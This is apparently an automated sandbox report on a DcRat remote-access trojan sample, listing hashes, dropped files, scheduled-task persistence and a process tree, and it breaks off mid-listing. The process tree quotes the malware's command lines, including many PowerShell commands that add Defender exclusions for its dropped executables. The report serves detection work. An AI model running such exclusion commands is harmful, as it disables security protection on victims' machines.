dcrat | d148fc48cce34f52e1d33cb4d1d5e66650fe856b8efa862cb05346a79a82646b

Analysis

max time kernel
149s
max time network
151s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
02/11/2022, 18:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d148fc48cce34f52e1d33cb4d1d5e66650fe856b8efa862cb05346a79a82646b.exe
Size

1.3MB
MD5

3a1c759ad579d22c9d933ba9edb6092e
SHA1

5bf8c4e653692aa96f334c753ed9c4a97a1b1b4d
SHA256

d148fc48cce34f52e1d33cb4d1d5e66650fe856b8efa862cb05346a79a82646b
SHA512

2c457cd1a3368084ef5e3fc393eb8f3cbe0de0e95f809e05c1411221db79bb00bfd2a323624885d82c4d6f8ddf0e4b281e2887b6cb7fc5c0b74f26b3cd726f7a
SSDEEP

24576:U2G/nvxW3Ww0t6TnzGmVBDh4+aknuRRZJND0gFJ4rD/IjC:UbA30GnzV/q+DnsXg

Score

10^/10

dcrat infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Process spawned unexpected child process 64 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4492	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4356	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4624	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2888	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5016	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3640	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5052	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4952	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5080	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3240	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4348	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3572	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4336	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2276	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4556	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4476	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3772	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4452	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4516	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4528	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3932	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	516	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3928	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	424	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1752	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	980	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1244	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1236	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1364	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	360	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	800	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1112	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	668	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	96	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	212	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	32	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2340	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2268	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2240	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1836	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	656	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	588	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1376	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2104	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2212	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	824	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4452	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4536	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4260	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4940	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	652	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	360	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1808	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4476	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	352	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3808	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4216	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5128	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5184	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5296	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5360	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5444	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5500	3172	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1480	3172	schtasks.exe	70

DCRat payload 14 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/files/0x000800000001ac2d-280.dat	dcrat
behavioral1/files/0x000800000001ac2d-281.dat	dcrat
behavioral1/memory/4820-282-0x00000000008B0000-0x00000000009C0000-memory.dmp	dcrat
behavioral1/files/0x000800000001ac2d-347.dat	dcrat
behavioral1/files/0x000700000001ac72-1259.dat	dcrat
behavioral1/files/0x000700000001ac72-1260.dat	dcrat
behavioral1/files/0x000700000001ac72-1473.dat	dcrat
behavioral1/files/0x000700000001ac72-1479.dat	dcrat
behavioral1/files/0x000700000001ac72-1484.dat	dcrat
behavioral1/files/0x000700000001ac72-1489.dat	dcrat
behavioral1/files/0x000700000001ac72-1494.dat	dcrat
behavioral1/files/0x000700000001ac72-1499.dat	dcrat
behavioral1/files/0x000700000001ac72-1505.dat	dcrat
behavioral1/files/0x000700000001ac72-1510.dat	dcrat

Executes dropped EXE 11 IoCs

pid	Process
4820	DllCommonsvc.exe
4492	DllCommonsvc.exe
5852	schtasks.exe
5132	schtasks.exe
2500	schtasks.exe
5384	schtasks.exe
5124	schtasks.exe
5208	schtasks.exe
5504	schtasks.exe
2668	schtasks.exe
2100	schtasks.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in Program Files directory 14 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Windows Mail\powershell.exe	DllCommonsvc.exe
File created	C:\Program Files\Microsoft Office\PackageManifests\conhost.exe	DllCommonsvc.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\fontdrvhost.exe	DllCommonsvc.exe
File created	C:\Program Files\WindowsPowerShell\3a6fe29a7ceee6	DllCommonsvc.exe
File created	C:\Program Files\Microsoft Office\PackageManifests\088424020bedd6	DllCommonsvc.exe
File created	C:\Program Files\Uninstall Information\conhost.exe	DllCommonsvc.exe
File created	C:\Program Files\WindowsPowerShell\schtasks.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows Mail\e978f868350d50	DllCommonsvc.exe
File created	C:\Program Files\Uninstall Information\088424020bedd6	DllCommonsvc.exe
File created	C:\Program Files (x86)\Common Files\Adobe\DllCommonsvc.exe	DllCommonsvc.exe
File created	C:\Program Files\Uninstall Information\dllhost.exe	DllCommonsvc.exe
File created	C:\Program Files\Uninstall Information\5940a34987c991	DllCommonsvc.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\5b884080fd4f94	DllCommonsvc.exe
File created	C:\Program Files (x86)\Common Files\Adobe\a76d7bf15d8370	DllCommonsvc.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File created	C:\Windows\ShellExperiences\services.exe	DllCommonsvc.exe
File created	C:\Windows\ShellExperiences\c5b4cb5e9653cc	DllCommonsvc.exe
File created	C:\Windows\fr-FR\wininit.exe	DllCommonsvc.exe
File created	C:\Windows\fr-FR\56085415360792	DllCommonsvc.exe
File created	C:\Windows\ModemLogs\cmd.exe	DllCommonsvc.exe
File created	C:\Windows\ModemLogs\ebf1f9fa8afd6d	DllCommonsvc.exe
File created	C:\Windows\SKB\LanguageModels\DllCommonsvc.exe	DllCommonsvc.exe
File created	C:\Windows\SKB\LanguageModels\a76d7bf15d8370	DllCommonsvc.exe
File created	C:\Windows\Globalization\ELS\SpellDictionaries\schtasks.exe	DllCommonsvc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 64 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4528	schtasks.exe
6060	schtasks.exe
6084	schtasks.exe
5596	schtasks.exe
4556	schtasks.exe
1752	schtasks.exe
4476	schtasks.exe
4216	schtasks.exe
5128	schtasks.exe
5016	schtasks.exe
824	schtasks.exe
4536	schtasks.exe
3808	schtasks.exe
5500	schtasks.exe
5220	schtasks.exe
5460	schtasks.exe
2276	schtasks.exe
652	schtasks.exe
360	schtasks.exe
520	schtasks.exe
4356	schtasks.exe
4476	schtasks.exe
360	schtasks.exe
4940	schtasks.exe
5576	schtasks.exe
5052	schtasks.exe
5776	schtasks.exe
3240	schtasks.exe
2268	schtasks.exe
1808	schtasks.exe
352	schtasks.exe
5136	schtasks.exe
5420	schtasks.exe
4336	schtasks.exe
4516	schtasks.exe
424	schtasks.exe
5360	schtasks.exe
1028	schtasks.exe
4624	schtasks.exe
4952	schtasks.exe
3772	schtasks.exe
32	schtasks.exe
2240	schtasks.exe
1480	schtasks.exe
5876	schtasks.exe
2272	schtasks.exe
4492	schtasks.exe
832	schtasks.exe
4416	schtasks.exe
5288	schtasks.exe
5052	schtasks.exe
5184	schtasks.exe
6128	schtasks.exe
1884	schtasks.exe
2340	schtasks.exe
5796	schtasks.exe
5896	schtasks.exe
3640	schtasks.exe
1112	schtasks.exe
96	schtasks.exe
2340	schtasks.exe
5296	schtasks.exe
3928	schtasks.exe
1364	schtasks.exe

Modifies registry class 11 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\Local Settings	schtasks.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\Local Settings	schtasks.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\Local Settings	schtasks.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\Local Settings	DllCommonsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\Local Settings	schtasks.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\Local Settings	schtasks.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\Local Settings	schtasks.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\Local Settings	d148fc48cce34f52e1d33cb4d1d5e66650fe856b8efa862cb05346a79a82646b.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\Local Settings	schtasks.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\Local Settings	schtasks.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\Local Settings	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4820	DllCommonsvc.exe
4820	DllCommonsvc.exe
4820	DllCommonsvc.exe
4820	DllCommonsvc.exe
4820	DllCommonsvc.exe
2848	powershell.exe
2848	powershell.exe
2708	powershell.exe
2708	powershell.exe
60	powershell.exe
60	powershell.exe
2452	powershell.exe
2452	powershell.exe
3832	powershell.exe
3832	powershell.exe
3732	powershell.exe
3732	powershell.exe
1684	powershell.exe
1684	powershell.exe
4752	powershell.exe
4752	powershell.exe
4756	powershell.exe
4756	powershell.exe
2144	powershell.exe
2144	powershell.exe
3832	powershell.exe
2384	powershell.exe
2384	powershell.exe
1476	powershell.exe
1476	powershell.exe
4120	powershell.exe
4120	powershell.exe
2360	powershell.exe
2360	powershell.exe
4072	powershell.exe
4872	powershell.exe
4872	powershell.exe
4072	powershell.exe
4492	DllCommonsvc.exe
4492	DllCommonsvc.exe
4492	DllCommonsvc.exe
4492	DllCommonsvc.exe
2848	powershell.exe
4756	powershell.exe
2708	powershell.exe
3832	powershell.exe
60	powershell.exe
2452	powershell.exe
1684	powershell.exe
3732	powershell.exe
1476	powershell.exe
4752	powershell.exe
2144	powershell.exe
2384	powershell.exe
4492	DllCommonsvc.exe
4492	DllCommonsvc.exe
4492	DllCommonsvc.exe
4872	powershell.exe
4120	powershell.exe
2848	powershell.exe
2360	powershell.exe
4072	powershell.exe
2708	powershell.exe
4756	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4820	DllCommonsvc.exe
Token: SeDebugPrivilege	2848	powershell.exe
Token: SeDebugPrivilege	2708	powershell.exe
Token: SeDebugPrivilege	60	powershell.exe
Token: SeDebugPrivilege	2452	powershell.exe
Token: SeDebugPrivilege	3832	powershell.exe
Token: SeDebugPrivilege	3732	powershell.exe
Token: SeDebugPrivilege	1684	powershell.exe
Token: SeDebugPrivilege	4752	powershell.exe
Token: SeDebugPrivilege	4756	powershell.exe
Token: SeDebugPrivilege	2144	powershell.exe
Token: SeDebugPrivilege	2384	powershell.exe
Token: SeDebugPrivilege	1476	powershell.exe
Token: SeDebugPrivilege	4120	powershell.exe
Token: SeDebugPrivilege	4492	DllCommonsvc.exe
Token: SeDebugPrivilege	2360	powershell.exe
Token: SeDebugPrivilege	4072	powershell.exe
Token: SeDebugPrivilege	4872	powershell.exe
Token: SeIncreaseQuotaPrivilege	3832	powershell.exe
Token: SeSecurityPrivilege	3832	powershell.exe
Token: SeTakeOwnershipPrivilege	3832	powershell.exe
Token: SeLoadDriverPrivilege	3832	powershell.exe
Token: SeSystemProfilePrivilege	3832	powershell.exe
Token: SeSystemtimePrivilege	3832	powershell.exe
Token: SeProfSingleProcessPrivilege	3832	powershell.exe
Token: SeIncBasePriorityPrivilege	3832	powershell.exe
Token: SeCreatePagefilePrivilege	3832	powershell.exe
Token: SeBackupPrivilege	3832	powershell.exe
Token: SeRestorePrivilege	3832	powershell.exe
Token: SeShutdownPrivilege	3832	powershell.exe
Token: SeDebugPrivilege	3832	powershell.exe
Token: SeSystemEnvironmentPrivilege	3832	powershell.exe
Token: SeRemoteShutdownPrivilege	3832	powershell.exe
Token: SeUndockPrivilege	3832	powershell.exe
Token: SeManageVolumePrivilege	3832	powershell.exe
Token: 33	3832	powershell.exe
Token: 34	3832	powershell.exe
Token: 35	3832	powershell.exe
Token: 36	3832	powershell.exe
Token: SeIncreaseQuotaPrivilege	2848	powershell.exe
Token: SeSecurityPrivilege	2848	powershell.exe
Token: SeTakeOwnershipPrivilege	2848	powershell.exe
Token: SeLoadDriverPrivilege	2848	powershell.exe
Token: SeSystemProfilePrivilege	2848	powershell.exe
Token: SeSystemtimePrivilege	2848	powershell.exe
Token: SeProfSingleProcessPrivilege	2848	powershell.exe
Token: SeIncBasePriorityPrivilege	2848	powershell.exe
Token: SeCreatePagefilePrivilege	2848	powershell.exe
Token: SeBackupPrivilege	2848	powershell.exe
Token: SeRestorePrivilege	2848	powershell.exe
Token: SeShutdownPrivilege	2848	powershell.exe
Token: SeDebugPrivilege	2848	powershell.exe
Token: SeSystemEnvironmentPrivilege	2848	powershell.exe
Token: SeRemoteShutdownPrivilege	2848	powershell.exe
Token: SeUndockPrivilege	2848	powershell.exe
Token: SeManageVolumePrivilege	2848	powershell.exe
Token: 33	2848	powershell.exe
Token: 34	2848	powershell.exe
Token: 35	2848	powershell.exe
Token: 36	2848	powershell.exe
Token: SeIncreaseQuotaPrivilege	2708	powershell.exe
Token: SeSecurityPrivilege	2708	powershell.exe
Token: SeTakeOwnershipPrivilege	2708	powershell.exe
Token: SeLoadDriverPrivilege	2708	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2772 wrote to memory of 5072	2772	d148fc48cce34f52e1d33cb4d1d5e66650fe856b8efa862cb05346a79a82646b.exe	66
PID 2772 wrote to memory of 5072	2772	d148fc48cce34f52e1d33cb4d1d5e66650fe856b8efa862cb05346a79a82646b.exe	66
PID 2772 wrote to memory of 5072	2772	d148fc48cce34f52e1d33cb4d1d5e66650fe856b8efa862cb05346a79a82646b.exe	66
PID 5072 wrote to memory of 4260	5072	WScript.exe	67
PID 5072 wrote to memory of 4260	5072	WScript.exe	67
PID 5072 wrote to memory of 4260	5072	WScript.exe	67
PID 4260 wrote to memory of 4820	4260	cmd.exe	69
PID 4260 wrote to memory of 4820	4260	cmd.exe	69
PID 4820 wrote to memory of 2848	4820	DllCommonsvc.exe	116
PID 4820 wrote to memory of 2848	4820	DllCommonsvc.exe	116
PID 4820 wrote to memory of 2708	4820	DllCommonsvc.exe	131
PID 4820 wrote to memory of 2708	4820	DllCommonsvc.exe	131
PID 4820 wrote to memory of 60	4820	DllCommonsvc.exe	118
PID 4820 wrote to memory of 60	4820	DllCommonsvc.exe	118
PID 4820 wrote to memory of 2452	4820	DllCommonsvc.exe	119
PID 4820 wrote to memory of 2452	4820	DllCommonsvc.exe	119
PID 4820 wrote to memory of 3832	4820	DllCommonsvc.exe	122
PID 4820 wrote to memory of 3832	4820	DllCommonsvc.exe	122
PID 4820 wrote to memory of 3732	4820	DllCommonsvc.exe	120
PID 4820 wrote to memory of 3732	4820	DllCommonsvc.exe	120
PID 4820 wrote to memory of 1684	4820	DllCommonsvc.exe	128
PID 4820 wrote to memory of 1684	4820	DllCommonsvc.exe	128
PID 4820 wrote to memory of 4752	4820	DllCommonsvc.exe	124
PID 4820 wrote to memory of 4752	4820	DllCommonsvc.exe	124
PID 4820 wrote to memory of 4756	4820	DllCommonsvc.exe	125
PID 4820 wrote to memory of 4756	4820	DllCommonsvc.exe	125
PID 4820 wrote to memory of 2144	4820	DllCommonsvc.exe	148
PID 4820 wrote to memory of 2144	4820	DllCommonsvc.exe	148
PID 4820 wrote to memory of 2384	4820	DllCommonsvc.exe	146
PID 4820 wrote to memory of 2384	4820	DllCommonsvc.exe	146
PID 4820 wrote to memory of 4120	4820	DllCommonsvc.exe	144
PID 4820 wrote to memory of 4120	4820	DllCommonsvc.exe	144
PID 4820 wrote to memory of 1476	4820	DllCommonsvc.exe	133
PID 4820 wrote to memory of 1476	4820	DllCommonsvc.exe	133
PID 4820 wrote to memory of 2360	4820	DllCommonsvc.exe	134
PID 4820 wrote to memory of 2360	4820	DllCommonsvc.exe	134
PID 4820 wrote to memory of 4072	4820	DllCommonsvc.exe	135
PID 4820 wrote to memory of 4072	4820	DllCommonsvc.exe	135
PID 4820 wrote to memory of 4872	4820	DllCommonsvc.exe	139
PID 4820 wrote to memory of 4872	4820	DllCommonsvc.exe	139
PID 4820 wrote to memory of 4492	4820	DllCommonsvc.exe	141
PID 4820 wrote to memory of 4492	4820	DllCommonsvc.exe	141
PID 4492 wrote to memory of 5448	4492	DllCommonsvc.exe	198
PID 4492 wrote to memory of 5448	4492	DllCommonsvc.exe	198
PID 4492 wrote to memory of 5668	4492	DllCommonsvc.exe	199
PID 4492 wrote to memory of 5668	4492	DllCommonsvc.exe	199
PID 4492 wrote to memory of 4648	4492	DllCommonsvc.exe	200
PID 4492 wrote to memory of 4648	4492	DllCommonsvc.exe	200
PID 4492 wrote to memory of 5456	4492	DllCommonsvc.exe	202
PID 4492 wrote to memory of 5456	4492	DllCommonsvc.exe	202
PID 4492 wrote to memory of 5524	4492	DllCommonsvc.exe	204
PID 4492 wrote to memory of 5524	4492	DllCommonsvc.exe	204
PID 4492 wrote to memory of 6032	4492	DllCommonsvc.exe	215
PID 4492 wrote to memory of 6032	4492	DllCommonsvc.exe	215
PID 4492 wrote to memory of 6064	4492	DllCommonsvc.exe	214
PID 4492 wrote to memory of 6064	4492	DllCommonsvc.exe	214
PID 4492 wrote to memory of 5624	4492	DllCommonsvc.exe	213
PID 4492 wrote to memory of 5624	4492	DllCommonsvc.exe	213
PID 4492 wrote to memory of 5740	4492	DllCommonsvc.exe	210
PID 4492 wrote to memory of 5740	4492	DllCommonsvc.exe	210
PID 4492 wrote to memory of 312	4492	DllCommonsvc.exe	211
PID 4492 wrote to memory of 312	4492	DllCommonsvc.exe	211
PID 4492 wrote to memory of 1676	4492	DllCommonsvc.exe	220
PID 4492 wrote to memory of 1676	4492	DllCommonsvc.exe	220

C:\Users\Admin\AppData\Local\Temp\d148fc48cce34f52e1d33cb4d1d5e66650fe856b8efa862cb05346a79a82646b.exe
"C:\Users\Admin\AppData\Local\Temp\d148fc48cce34f52e1d33cb4d1d5e66650fe856b8efa862cb05346a79a82646b.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2772
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\providercommon\1zu9dW.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4260
  - - C:\providercommon\DllCommonsvc.exe
      "C:\providercommon\DllCommonsvc.exe"
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4820
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2848
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\AccountPictures\dllhost.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:60
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\Idle.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2452
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\spoolsv.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3732
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\taskhostw.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3832
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\fr-FR\wininit.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4752
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\spoolsv.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4756
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ShellExperiences\services.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1684
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\taskhostw.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2708
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\Adobe\DllCommonsvc.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1476
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\dllhost.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2360
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Oracle\Java\javapath\lsass.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4072
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Templates\OfficeClickToRun.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4872
    - - C:\providercommon\DllCommonsvc.exe
        
        "C:\providercommon\DllCommonsvc.exe"
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4492
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
        6⤵
        
        PID:5448
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\schtasks.exe'
        6⤵
        
        PID:5668
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\schtasks.exe'
        6⤵
        
        PID:4648
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Mozilla\updates\308046B0AF4A39CB\csrss.exe'
        6⤵
        
        PID:5456
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
